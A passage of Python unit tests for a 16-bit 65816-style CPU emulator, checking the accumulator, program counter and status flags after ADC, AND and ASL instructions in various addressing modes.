self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_indexed_ind_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.y = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_indexed_ind_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_indexed_ind_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_indexed_ind_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.y = 0x03
# $0000 $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0000, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
mpu.y = 0x03
# $0000 $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_indexed_ind_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Immediate
def test_adc_bcd_off_immediate_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0
# $0000 ADC #$0000
self._write(mpu.memory, 0x0000, (0x69, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_immediate_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC #$0000
self._write(mpu.memory, 0x0000, (0x69, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_immediate_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC #$FEFF
self._write(mpu.memory, 0x0000, (0x69, 0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_immediate_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC #$FFFF
self._write(mpu.memory, 0x0000, (0x69, 0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_immediate_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC #$01
self._write(mpu.memory, 0x000, (0x69, 0x01, 0X00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC #$FFFF
self._write(mpu.memory, 0x000, (0x69, 0xff, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC #$01
self._write(mpu.memory, 0x000, (0x69, 0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC #$FFFF
self._write(mpu.memory, 0x000, (0x69, 0xff, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_immediate_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.a = 0x4000
# $0000 ADC #$4000
self._write(mpu.memory, 0x0000, (0x69, 0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Absolute
def test_and_absolute_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $ABCD
self._write(mpu.memory, 0x0000, (0x2D, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_absolute_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $ABCD
self._write(mpu.memory, 0x0000, (0x2D, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Absolute, X-Indexed
def test_and_abs_x_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $ABCD,X
self._write(mpu.memory, 0x0000, (0x3d, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_abs_x_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $ABCD,X
self._write(mpu.memory, 0x0000, (0x3d, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Absolute, Y-Indexed
def test_and_abs_y_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND $ABCD,X
self._write(mpu.memory, 0x0000, (0x39, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_abs_y_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND $ABCD,X
self._write(mpu.memory, 0x0000, (0x39, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page
def test_and_dp_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $0010
self._write(mpu.memory, 0x0000, (0x25, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_dp_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND $0010
self._write(mpu.memory, 0x0000, (0x25, 0x10))
self._write(mpu.memory, 0x0010, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page, X-Indexed
def test_and_dp_x_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $0010,X
self._write(mpu.memory, 0x0000, (0x35, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_dp_x_all_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND $0010,X
self._write(mpu.memory, 0x0000, (0x35, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page Indirect, Indexed (X)
def test_and_ind_indexed_x_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x21, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_ind_indexed_x_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.x = 0x03
# $0000 AND ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x21, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page, Indirect
def test_and_dp_ind_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x32, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_dp_ind_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x32, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Direct Page Indexed, Indirect (Y)
def test_and_indexed_ind_y_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x31, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_indexed_ind_y_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
mpu.y = 0x03
# $0000 AND ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x31, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# AND Immediate
def test_and_immediate_all_zeros_setting_zero_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND #$00
self._write(mpu.memory, 0x0000, (0x29, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_and_immediate_zeros_and_ones_setting_negative_flag(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 AND #$AA
self._write(mpu.memory, 0x0000, (0x29, 0xAA, 0xAA))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAAAA, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ASL Accumulator
def test_asl_accumulator_sets_z_flag(self):
mpu = self._make_mpu()
mpu.a = 0x00
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_accumulator_sets_n_flag(self):
mpu = self._make_mpu()
mpu.a = 0x4000
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_accumulator_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0x7FFF
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFFE, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_accumulator_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xFFFF
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFFE, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_asl_accumulator_80_sets_z_flag(self):
mpu = self._make_mpu()
mpu.a = 0x8000
mpu.p &= ~(mpu.ZERO)
# $0000 ASL
mpu.memory[0x0000] = 0x0A
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
# ASL Absolute
def test_asl_absolute_sets_z_flag(self):
mpu = self._make_mpu()
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD])
self.assertEqual(0x00, mpu.memory[0xABCD+1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_absolute_sets_n_flag(self):
mpu = self._make_mpu()
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD])
self.assertEqual(0x80, mpu.memory[0xABCD+1])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_absolute_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD])
self.assertEqual(0xFF, mpu.memory[0xABCD+1])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_absolute_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $ABCD
self._write(mpu.memory, 0x0000, (0x0E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD])
self.assertEqual(0xFF, mpu.memory[0xABCD+1])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ASL Absolute, X-Indexed
def test_asl_abs_x_indexed_sets_z_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x00, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_abs_x_indexed_sets_n_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0x80, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_abs_x_indexed_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0xAA
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0xFF, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_abs_x_indexed_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xAA
mpu.x = 0x03
# $0000 ASL $ABCD,X
self._write(mpu.memory, 0x0000, (0x1E, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0xABCD + mpu.x])
self.assertEqual(0xFF, mpu.memory[0xABCD + 1 + mpu.x])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ASL Direct Page
def test_asl_dp_sets_z_flag(self):
mpu = self._make_mpu()
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010])
self.assertEqual(0x00, mpu.memory[0x0010 + 1])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_dp_sets_n_flag(self):
mpu = self._make_mpu()
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010])
self.assertEqual(0x80, mpu.memory[0x0010 + 1])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_dp_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_dp_shifts_out_one(self):
mpu = self._make_mpu()
mpu.a = 0xAA
# $0000 ASL $0010
self._write(mpu.memory, 0x0000, (0x06, 0x10))
self._write(mpu.memory, 0x0010, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1])
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ASL Direct Page, X-Indexed
def test_asl_dp_x_indexed_sets_z_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x00, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
def test_asl_dp_x_indexed_sets_n_flag(self):
mpu = self._make_mpu()
mpu.x = 0x03
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x80, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_asl_dp_x_indexed_shifts_out_zero(self):
mpu = self._make_mpu()
mpu.x = 0x03
mpu.a = 0xAA
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0xFF, 0x7F))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(0, mpu.p & mpu.CARRY)
def test_asl_dp_x_indexed_shifts_out_one(self):
mpu = self._make_mpu()
mpu.x = 0x03
mpu.a = 0xAA
# $0000 ASL $0010,X
self._write(mpu.memory, 0x0000, (0x16, 0x10))
self._write(mpu.memory, 0x0010 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xAA, mpu.a)
self.assertEqual(0xFE, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0xFF, mpu.memory[0x0010 + 1 + mpu.x])
